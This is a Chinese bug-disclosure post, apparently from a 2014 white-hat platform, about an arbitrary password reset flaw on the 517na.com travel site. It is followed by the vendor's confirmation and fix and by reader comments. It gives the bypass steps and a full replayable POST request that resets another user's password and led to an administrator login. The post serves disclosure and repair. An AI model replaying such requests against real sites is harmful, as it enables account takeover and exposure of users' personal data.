四川我要去哪517旅行网重置任意账号密码漏洞

我先注册了一个自己的账号，然后按照找回密码的正常流程走了一遍。猜测可能存在逻辑绕过：

然后我从主站fuzz到一个账号为qingxia，点击找回密码，

咦，打了马赛克！！右键查看源代码里发现有详细的手机号和邮箱。。（马赛克你是在逗我吗！）

在找回密码处点击获取验证码后，随便输入一个6位数（此处无需短信验证码正确与否），点下一步。

然后直接提交如下post包修改密码。（此数据包为我的账号用正常流程抓取到的第三步设置新密码的数据包）

注意：需修改ASP.NET_SessionId为当前sessionid，staffID修改为要重置密码的用户名qingxia

POST /FindPassword/ChangePsw HTTP/1.1
 Host: user.517na.com
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
 Accept: */*
 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://user.517na.com/FindPassword/ComfirmNewPwd?UserID=xjcjinmao&R=353730&D=2014-07-11%2022:05:23&Sign=C8690DB5B5240F7702755E8F8859622F
 Content-Length: 31
 Cookie: ASP.NET_SessionId=zvxqzk22ejubrmmk40hxr05e
 Connection: keep-alive
 Pragma: no-cache
 Cache-Control: no-cache
 
 password=123123&staffID=qingxia

返回OK！！！

尝试用qingxia 123123登录，成功进入后台，发现是一个票务分销商的账号：

查看源代码把我惊呆了，密码的md5清晰的写在了里面：

还是一个管理员账号：

就在此时，终于等到面试官叫我进去面试了，然后就没有然后了。。。

听说贵公司安全是运维在做。。。

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-11-10 10:49

厂商回复：

谢谢，已确认，正在修复。

最新状态：

2014-11-11：已修复。

1. 2014-11-09 14:56 | 夏殇 ( 实习白帽子 | Rank:44 漏洞数:26 | 不忘初心，方得始终。)

   1

   哎呀，jim叔卖萌了

   1# 回复此人

2. 2014-11-10 17:11 | Seven.Sea ( 普通白帽子 | Rank:118 漏洞数:28 | 唯有安全与美食不可辜负。)

   1

   这个描述我真是醉了

   2# 回复此人

3. 2014-11-12 11:16 | Pt0s ( 路人 | Rank:4 漏洞数:1 | 好奇怪，那人好像一条狗啊)

   1

   zui 醉了

   3# 回复此人

4. 2014-11-12 12:25 | BMa ( 核心白帽子 | Rank:2078 漏洞数:229 )

   1

   这应该是跳过了验证步骤？

   4# 回复此人

5. 2014-11-13 15:04 | milk ( 路人 | Rank:21 漏洞数:6 | 美女，你肥皂掉了)

   1

   你继续看，会发现他们公司其他更好玩的事情

   5# 回复此人

6. 2014-11-13 15:24 | Jim叔叔 ( 普通白帽子 | Rank:153 漏洞数:25 | 这样子不太好吧。。)

   1

   @milk 前端还是后端

   6# 回复此人

7. 2014-11-14 13:03 | kaysen ( 路人 | Rank:8 漏洞数:3 | 折腾Python、Php、Linux)

   2

   你那在线解密只解密白C似的密码，复杂一点的解不出，实际上是拿字典生成了原始密码=>MD5密码，存入数据库的

   7# 回复此人

8. 2014-11-27 13:43 | weeeer ( 路人 | Rank:14 漏洞数:1 | 在路上.........)

   1

   默默连上wifi

   8# 回复此人